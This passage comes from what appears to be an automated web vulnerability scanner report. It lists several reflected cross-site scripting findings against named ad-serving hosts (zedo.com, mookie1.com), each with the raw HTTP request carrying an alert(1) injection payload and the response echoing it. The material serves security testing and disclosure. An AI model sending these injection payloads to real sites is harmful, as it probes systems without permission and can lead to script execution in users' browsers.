Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,9:809,1050,21; FFad=0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=230
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:31 GMT
Connection: close
Content-Length: 1402

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='51435";alert(1)//b3de24d718e';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=51435";alert(1)//b3de24d718e;z="+Math.random();}

if(zzuid=='unknown')zzuid='xlO0TcGt89Z-t7Q0A2jzc9p9~042411';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

6.126. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d822c'%3balert(1)//e059313edd2 was submitted in the q parameter. This input was echoed as d822c';alert(1)//e059313edd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=3&q=d822c'%3balert(1)//e059313edd2&$=&s=376&z=0.8531599652840236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,9:809,1050,21; FFad=0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=229
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:32 GMT
Connection: close
Content-Length: 1402

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='d822c';alert(1)//e059313edd2';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d822c';alert(1)//e059313edd2;z="+Math.random();}

if(zzuid=='unknown')zzuid='xlO0TcGt89Z-t7Q0A2jzc9p9~042411';

var zzhasAd
...[SNIP]...

6.127. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde8f'%3balert(1)//73824d8a34d was submitted in the q parameter. This input was echoed as cde8f';alert(1)//73824d8a34d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=21&q=cde8f'%3balert(1)//73824d8a34d&$=&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:37 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=7VO0TcGt89YyWDpLRT6@H7GR~042411;expires=Wed, 21 Apr 2021 16:46:37 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=224
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:37 GMT
Connection: close
Content-Length: 1967

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='cde8f';alert(1)//73824d8a34d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=cde8f';alert(1)//73824d8a34d;z="+Math.random();}

var zzhasAd=undefined;


                   var zzS
...[SNIP]...

6.128. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86262'%3balert(1)//56d2b9a2e3d was submitted in the $ parameter. This input was echoed as 86262';alert(1)//56d2b9a2e3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1050&a=0&f=&n=809&r=21&d=21&q=&$=86262'%3balert(1)//56d2b9a2e3d&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:86262';alert(1)//56d2b9a2e3d;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=7lO0TcGt89aILF5OFc2QSWrt~042411;expires=Wed, 21 Apr 2021 16:46:38 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:38 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=223
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:38 GMT
Connection: close
Content-Length: 2792

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',86262';alert(1)//56d2b9a2e3d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,86262';alert(1)//56d2b9a2e3d;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;



...[SNIP]...

6.129. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8faee"%3balert(1)//d396f2b7805 was submitted in the $ parameter. This input was echoed as 8faee";alert(1)//d396f2b7805 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1050&a=0&f=&n=809&r=21&d=21&q=&$=8faee"%3balert(1)//d396f2b7805&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:8faee";alert(1)//d396f2b7805;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=7VO0TcGt89aVGEBd-RfjVglC~042411;expires=Wed, 21 Apr 2021 16:46:37 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:37 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=224
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:37 GMT
Connection: close
Content-Length: 2792

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',8faee";alert(1)//d396f2b7805';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,8faee";alert(1)//d396f2b7805;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;


                   var zzStr = "s=376;u=unknown;z=" + Math.random();
var ainfo = "";

var zzDa
...[SNIP]...

6.130. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fb32"%3balert(1)//398db489eab was submitted in the q parameter. This input was echoed as 8fb32";alert(1)//398db489eab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1050&a=0&f=&n=809&r=21&d=21&q=8fb32"%3balert(1)//398db489eab&$=&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:32 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=6FO0TcGt89YNscx10CX4BQVt~042411;expires=Wed, 21 Apr 2021 16:46:32 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=229
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:32 GMT
Connection: close
Content-Length: 2789

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='8fb32";alert(1)//398db489eab';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8fb32";alert(1)//398db489eab;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;


                   var zzStr = "s=376;u=unknown;z=" + Math.random();
var ainfo = "";

var zzDa
...[SNIP]...

6.131. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91bd8'%3balert(1)//2889ed15347 was submitted in the q parameter. This input was echoed as 91bd8';alert(1)//2889ed15347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1050&a=0&f=&n=809&r=21&d=21&q=91bd8'%3balert(1)//2889ed15347&$=&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:32 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=6FO0TcGt89al5O1Bd5RKXS1X~042411;expires=Wed, 21 Apr 2021 16:46:32 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=229
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:32 GMT
Connection: close
Content-Length: 2789

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='91bd8';alert(1)//2889ed15347';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=91bd8';alert(1)//2889ed15347;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;



...[SNIP]...

6.132. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11325065670@x24

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc42"><script>alert(1)</script>16bb1f03db5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM9cc42"><script>alert(1)</script>16bb1f03db5/RTB/11325065670@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM9cc42"><script>alert(1)</script>16bb1f03db5/RTB/867158363/x24/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.133. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11325065670@x24

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61950"><script>alert(1)</script>a6a3ac04b81 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/RTB61950"><script>alert(1)</script>a6a3ac04b81/11325065670@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/RTB61950"><script>alert(1)</script>a6a3ac04b81/1896062523/x24/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.134. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11325065670@x24

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ba5"><script>alert(1)</script>4070ad386ef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/RTB/11325065670@x2432ba5"><script>alert(1)</script>4070ad386ef?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/RTB/542634406/x2432ba5"><script>alert(1)</script>4070ad386ef/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.135. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11377797616@x24

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c9d6"><script>alert(1)</script>c84d9d0e967 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM3c9d6"><script>alert(1)</script>c84d9d0e967/RTB/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:27:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM3c9d6"><script>alert(1)</script>c84d9d0e967/RTB/54719902/x24/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG S
...[SNIP]...

6.136. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11377797616@x24

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0296"><script>alert(1)</script>11ae911f7b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/RTBb0296"><script>alert(1)</script>11ae911f7b6/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:28:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/RTBb0296"><script>alert(1)</script>11ae911f7b6/1118908868/x24/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.137. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11377797616@x24

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ee0"><script>alert(1)</script>4c14aa33ca3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/RTB/11377797616@x24f0ee0"><script>alert(1)</script>4c14aa33ca3?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
